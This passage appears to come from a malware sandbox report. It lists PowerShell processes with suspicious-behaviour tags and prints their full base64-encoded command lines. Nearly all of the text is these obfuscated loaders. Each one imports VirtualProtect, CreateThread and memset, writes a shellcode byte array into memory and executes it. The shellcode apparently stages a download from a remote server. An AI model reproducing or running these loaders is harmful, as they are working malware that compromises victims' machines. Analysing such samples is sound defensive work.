gA4ACwAfQAwADAALAB9ADIAMAAsAH0AMAAwACwAfQAwADAALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9ADEAMgAsAH0AOQA2ACwAfQA4ADkALAB9AGUAMgAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9AGMAZgAsAH0AOABiACwAfQAwADcALAB9ADAAMQAsAH0AYwAzACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQBlADUALAB9ADUAOAAsAH0AYwAzACwAfQA1AGYALAB9AGUAOAAsAH0ANgBiACwAfQBmAGYALAB9AGYAZgAsAH0AZgBmACwAfQAzADEALAB9ADMAOQAsAH0AMwAyACwAfQAyAGUALAB9ADMAMQAsAH0AMwA2ACwAfQAzADgALAB9ADIAZQAsAH0AMwAxACwAfQAyAGUALAB9ADMAMQAsAH0AMwAwACwAfQAzADQALAB9ADAAMAAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAEcAcAA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQASgBvACAALQBOAGEAbQBlACAAIgBuAFgAIgAgAC0AbgBhAG0AZQBzACAATgBTAG4AOwAkAEcAcAA9ACQARwBwAC4AcgBlAHAAbABhAGMAZQAoACIATgBTAG4AIgAsACAAIgBXAGkAbgAzADIARgB1ACIAKwAiAG4AIgArACIAYwB0AGkAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAYgBuACAAPQAgACQAYgBuAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBOAEUAbABqAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIATgBFAGwAagAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQASwBzAD0AMAB4ADEAMAAwADgAOwBpAGYAIAAoACQAYgBuAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADgAKQB7ACQASwBzAD0AJABiAG4ALgBMAH0AOwAkAHEARgA9ACQARwBwADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAA4ACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABxAGsAZQAgAD0AIAAwADsAZgBvAHIAKAAkAE8AegA9ADAAOwAkAE8AegAgAC0AbABlACgAJABiAG4ALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQATwB6ACsAKwApAHsAJABHAHAAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAEYALgBUAG8ASQBuAHQAMwAyACgAKQArACQATwB6ACkALAAgACQAYgBuAFsAJABPAHoAXQAsACAAMQApAH0AOwAkAEcAcAA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABxAEYALAAgADAAeAAxADAAMAA4ACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABxAGsAZQApADsAJABU'+'AEMAWAA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJABHAHAAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwB1AGkAbgB0ADMAMgBdAFsAaQBuAHQAXQAwACwAJABUAEMAWAAsACQAcQBGACwAMAAsADAALAAwACkAOwAnADsAJAB5AGkAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAE4AUwApACkAOwAkAGgAZAA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABTAGcAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAZgB6AFQAWgAgAD0AIAAiAEMAOgBcACQAUwBnAFwAVQBzAGkAdQBNAFAAQQBcACQAUwBnACQAaABkAFwAdgAxAC4AMABcACQAaABkACIAOwAkAGYAegBUAFoAIAA9ACAAJABmAHoAVABaAC4AcgBlAHAAbABhAGMAZQAoACIAVQBzAGkAdQAiACwAIAAiAHMAeQBzACIAKQA7ACQAZgB6AFQAWgAgAD0AIAAkAGYAegBUAFoALgByAGUAcABsAGEAYwBlACgAIgBNAFAAQQAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAGUAYQBqACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAGUAYQBqACcAKQB7ACQAaABkAD0AIAAkAGYAegBUAFoAfQA7ACQAawBuAD0AIgAgACQAaABkACAATQBjAGMAIAAkAHkAaQAiADsAJABrAG4APQAkAGsAbgAuAHIAZQBwAGwAYQBjAGUAKAAiAE0AYwBjACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAawBuAA'+'==')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABOAFMAPQAnACQASgBvAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsACIAKwAiAGwAIgArACIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbAAiACsAIgBsACIAKwAiACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABxAGsAZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAYgBuAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA4ADkALAB9AGUANQAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA1ADcALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AMwAxACwAfQBmAGYALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADYAZQAsAH0ANgA1ACwAfQA3ADQALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADkALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9AGYAZgAsAH0AZAA1ACwAfQAzADEALAB9AGQAYgAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9AGUAOAAsAH0AMwBlACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA0AGQALAB9ADYAZgAsAH0ANwBhACwAfQA2ADkALAB9ADYAYwAsAH0ANgBjACwAfQA2ADEALAB9ADIAZgAsAH0AMwA1ACwAfQAyAGUALAB9ADMAMAAsAH0AMgAwACwAfQAyADgALAB9ADUANwAsAH0ANgA5ACwAfQA2AGUALAB9ADYANAAsAH0ANgBmACwAfQA3ADcALAB9ADcAMwAsAH0AMgAwACwAfQA0AGUALAB9ADUANAAsAH0AMgAwACwAfQAzADYALAB9ADIAZQAsAH0AMwAxACwAfQAzAGIALAB9ADIAMAAsAH0ANQA0ACwAfQA3ADIALAB9ADYAOQAsAH0ANgA0ACwAfQA2ADUALAB9ADYAZQAsAH0ANwA0ACwAfQAyAGYALAB9ADMANwAsAH0AMgBlACwAfQAzADAALAB9ADMAYgAsAH0AMgAwACwAfQA3ADIALAB9ADcANgAsAH0AMwBhACwAfQAzADEALAB9ADMAMQAsAH0AMgBlACwAfQAzADAALAB9ADIAOQAsAH0AMgAwACwAfQA2AGMALAB9ADYAOQAsAH0ANgBiACwAfQA2ADUALAB9ADIAMAAsAH0ANAA3ACwAfQA2ADUALAB9ADYAMwAsAH0ANgBiACwAfQA2AGYALAB9ADAAMAAsAH0ANgA4ACwAfQAzAGEALAB9ADUANgAsAH0ANwA5ACwAfQBhADcALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADMALAB9ADUAMwAsAH0ANgBhACwAfQAwADMALAB9ADUAMwAsAH0ANQAzACwAfQA2ADgALAB9ADUAYgAsAH0AMQAxACwAfQAwADAALAB9ADAAMAAsAH0AZQA4ACwAfQA3ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAZgAsAH0ANwA1ACwAfQA1ADMALAB9ADMANQAsAH0ANAA5ACwAfQA0AGMALAB9ADMAMgAsAH0ANwA3ACwAfQA1ADUALAB9ADQAOAAsAH0ANQAwACwAfQA2AGIALAB9ADUANgAsAH0ANQA2ACwAfQA1ADIALAB9ADUAMgAsAH0ANQA1ACwAfQA1ADMALAB9ADYAOQAsAH0ANgAzACwAfQA3ADEALAB9ADMANgAsAH0ANQAxACwAfQA2ADUALAB9ADMANAAsAH0AMwAxACwAfQAzADEALAB9ADQAMgAsAH0ANAA3ACwAfQA0AGMALAB9ADQAYgAsAH0ANgBkACwAfQA0ADkALAB9ADQAMwAsAH0ANQAxACwAfQA3ADIALAB9ADUAMAAsAH0ANAA2ACwAfQA0ADYALAB9ADUANgAsAH0ANABlACwAfQA2AGQALAB9ADQAYQAsAH0AMwA5ACwAfQA0AGQALAB9ADcAYQAsAH0ANAA4ACwAfQA2ADUALAB9ADUANQAsAH0ANQAxACwAfQA1ADAALAB9ADMAOAAsAH0ANwA0ACwAfQA2ADQALAB9ADYAOQAsAH0ANwAzACwAfQAzADkALAB9ADMANgAsAH0ANgBkACwAfQA3AGEALAB9ADMAMwAsAH0ANAA1ACwAfQA0ADQALAB9ADYANAAsAH0ANAA2ACwAfQA3ADAALAB9ADMAMQAsAH0ANgBiACwAfQA3ADYALAB9ADQANQAsAH0ANAAzACwAfQAzADUALAB9ADUAZgAsAH0ANAAyACwAfQA0ADQALAB9ADUAMAAsAH0ANABmACwAfQA3ADAALAB9ADQAYQAsAH0ANAA5ACwAfQA3ADgALAB9ADUAYQAsAH0ANAA4ACwAfQA0ADYALAB9ADUANwAsAH0AMwAxACwAfQA2AGMALAB9ADcAMgAsAH0ANwAyACwAfQAyAGQALAB9ADcAMgAsAH0ANgAxACwAfQA0ADcALAB9ADQANgAsAH0ANAA3ACwAfQA1ADQALAB9ADQAYgAsAH0ANwAzACwAfQA0AGUALAB9ADUAMgAsAH0ANAA0ACwAfQA2ADcALAB9ADUAOQAsAH0ANAA1ACwAfQA1ADQALAB9ADQAYgAsAH0ANQA0ACwAfQA0ADkALAB9ADYAZAAsAH0ANwA0ACwAfQA2ADEALAB9ADYANgAsAH0ANgBhACwAfQA0ADEALAB9ADYAOAAsAH0ANQAzACwAfQA2ADYALAB9ADMAMQAsAH0ANwA5ACwAfQA0ADkALAB9ADQAYQAsAH0ANABkACwAfQAzADcALAB9ADUAMAAsAH0ANQA1ACwAfQA0ADYALAB9ADMAMQAsAH0ANAA2ACwAfQA0AGYALAB9ADMAMwAsAH0ANABlACwAfQAzADMALAB9ADYANAAsAH0ANwA2ACwAfQA0AGYALAB9ADMANQAsAH0ANQBhACwAfQA1ADIALAB9ADcAMQAsAH0ANgAzACwAfQAzADUALAB9ADMANQAsAH0AMgBkACwAfQA3AGEALAB9ADYAYwAsAH0ANgAzACwAfQA3ADcALAB9ADYANwAsAH0ANgBiACwAfQA3ADgALAB9ADMAMQAsAH0ANgBhACwAfQA2ADEALAB9ADcAMwAsAH0ANQBhACwAfQA0ADYALAB9ADQAZgAsAH0ANgA0ACwAfQA0AGMALAB9ADMANgAsAH0ANQA0ACwAfQA3ADgALAB9ADYAMgAsAH0ANQA0ACwAfQA1ADQALAB9ADQAMQAsAH0ANQA2ACwAfQA0AGQALAB9ADQAYwAsAH0ANwA5ACwAfQA1ADMALAB9ADMANAAsAH0AMwAwACwAfQA3ADIALAB9ADYAMwAsAH0ANABhACwAfQA2ADYALAB9ADQAMgAsAH0ANwA0ACwAfQA3ADUALAB9ADYAYwAsAH0AMwAxACwAfQA2ADQALAB9ADcAMAAsAH0ANQA5ACwAfQA2ADUALAB9ADcAMwAsAH0ANgAyACwAfQAzADgALAB9ADUANQAsAH0AMwA2ACwAfQA0ADEALAB9ADQAZAAsAH0ANQA4ACwAfQA3AGEALAB9ADcAMQAsAH0ANQA3ACwAfQAzADcALAB9ADMANgAsAH0ANwAxACwAfQA2ADEALAB9ADMAMQAsAH0AMwA5ACwAfQA0ADIALAB9ADMAOQAsAH0AMwA0ACwAfQA0ADMALAB9ADMAOQAsAH0ANwAwACwAfQAzADkALAB9ADcAMwAsAH0ANgA1ACwAfQAzADAALAB9ADMANQAsAH0ANQAzACwAfQA1ADIALAB9ADcAMQAsAH0ANgAxACwAfQAyAGQALAB9ADcANwAsAH0ANgA0ACwAfQA2ADMALAB9ADYAZQAsAH0ANgBmACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQA1ADcALAB9ADgAOQAsAH0AOQBmACwAfQBjADYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADkALAB9AGMANgAsAH0ANQAzACwAfQA2ADgALAB9ADAAMAAsAH0AMwAyACwAfQBlADgALAB9ADgANAAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQA3ACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQBlAGIALAB9ADUANQAsAH0AMgBlACwAfQAzAGIALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADYALAB9ADYAYQAsAH0AMABhACwAfQA1AGYALAB9ADYAOAAsAH0AOAAwACwAfQAzADMALAB9ADAAMAAsAH0AMAAwACwAfQA4ADkALAB9AGUAMAAsAH0ANgBhACwAfQAwADQALAB9ADUAMAAsAH0ANgBhACwAfQAxAGYALAB9ADUANgAsAH0ANgA4ACwAfQA3ADUALAB9ADQANgAsAH0AOQBlACwAfQA4ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAyAGQALAB9ADAANgAsAH0AMQA4ACwAfQA3AGIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQAxADQALAB9ADYAOAAsAH0AOAA4ACwAfQAxADMALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADQANAAsAH0AZgAwACwAfQAzADUALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADQAZgAsAH0ANwA1ACwAfQBjAGQALAB9AGUAOAAsAH0ANABhACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0AMAAwACwAfQAwADAALAB9ADQAMAAsAH0AMAAwACwAfQA1ADMALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADUAMwAsAH0AOAA5ACwAfQBlADcALAB9ADUANwAsAH0ANgA4ACwAfQAwADAALAB9ADIAMAAsAH0AMAAwACwAfQAwADAALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9ADEAMgAsAH0AOQA2ACwAfQA4ADkALAB9AGUAMgAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9AGMAZgAsAH0AOABiACwAfQAwADcALAB9ADAAMQAsAH0AYwAzACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQBlADUALAB9ADUAOAAsAH0AYwAzACwAfQA1AGYALAB9AGUAOAAsAH0ANgBiACwAfQBmAGYALAB9AGYAZgAsAH0AZgBmACwAfQAzADEALAB9ADMAOQAsAH0AMwAyACwAfQAyAGUALAB9ADMAMQAsAH0AMwA2ACwAfQAzADgALAB9ADIAZQAsAH0AMwAxACwAfQAyAGUALAB9ADMAMQAsAH0AMwAwACwAfQAzADQALAB9ADAAMAAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAEcAcAA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQASgBvACAALQBOAGEAbQBlACAAIgBuAFgAIgAgAC0AbgBhAG0AZQBzACAATgBTAG4AOwAkAEcAcAA9ACQARwBwAC4AcgBlAHAAbABhAGMAZQAoACIATgBTAG4AIgAsACAAIgBXAGkAbgAzADIARgB1ACIAKwAiAG4AIgArACIAYwB0AGkAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAYgBuACAAPQAgACQAYgBuAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBOAEUAbABqAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIATgBFAGwAagAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQASwBzAD0AMAB4ADEAMAAwADgAOwBpAGYAIAAoACQAYgBuAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADgAKQB7ACQASwBzAD0AJABiAG4ALgBMAH0AOwAkAHEARgA9ACQARwBwADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAA4ACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABxAGsAZQAgAD0AIAAwADsAZgBvAHIAKAAkAE8AegA9ADAAOwAkAE8AegAgAC0AbABlACgAJABiAG4ALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQATwB6ACsAKwApAHsAJABHAHAAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAEYALgBUAG8ASQBuAHQAMwAyACgAKQArACQATwB6ACkALAAgACQAYgBuAFsAJABPAHoAXQAsACAAMQApAH0AOwAkAEcAcAA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABxAEYALAAgADAAeAAxADAAMAA4ACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABxAGsAZQApADsAJABUAEMAWAA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJABHAHAAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwB1AGkAbgB0ADMAMgBdAFsAaQBuAHQAXQAwACwAJABUAEMAWAAsACQAcQBGACwAMAAsADAALAAwACkAOwAnADsAJAB5AGkAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAE4AUwApACkAOwAkAGgAZAA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABTAGcAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAZgB6AFQAWgAgAD0AIAAiAEMAOgBcACQAUwBnAFwAVQBzAGkAdQBNAFAAQQBcACQAUwBnACQAaABkAFwAdgAxAC4AMABcACQAaABkACIAOwAkAGYAegBUAFoAIAA9ACAAJABmAHoAVABaAC4AcgBlAHAAbABhAGMAZQAoACIAVQBzAGkAdQAiACwAIAAiAHMAeQBzACIAKQA7ACQAZgB6AFQAWgAgAD0AIAAkAGYAegBUAFoALgByAGUAcABsAGEAYwBlACgAIgBNAFAAQQAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAGUAYQBqACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAGUAYQBqACcAKQB7ACQAaABkAD0AIAAkAGYAegBUAFoAfQA7ACQAawBuAD0AIgAgACQAaABkACAATQBjAGMAIAAkAHkAaQAiADsAJABrAG4APQAkAGsAbgAuAHIAZQBwAGwAYQBjAGUAKAAiAE0AYwBjACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAawBuAA==
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:332

C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
"C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABKAG8APQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsACIAKwAiAGwAIgArACIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbAAiACsAIgBsACIAKwAiACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABxAGsAZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAGIAbgA9ACIAfQBlADgALAB9ADgAZgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQAzADEALAB9AGQAMgAsAH0AOAA5ACwAfQBlADUALAB9ADYANAAsAH0AOABiACwAfQA1ADIALAB9ADMAMAAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGYAZgAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADQAOQAsAH0ANwA1ACwAfQBlAGYALAB9ADUAMgAsAH0AOABiACwAfQA1ADIALAB9ADEAMAAsAH0ANQA3ACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADAALAB9ADcAOAAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0ANABjACwAfQAwADEALAB9AGQAMAAsAH0ANQAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOABiACw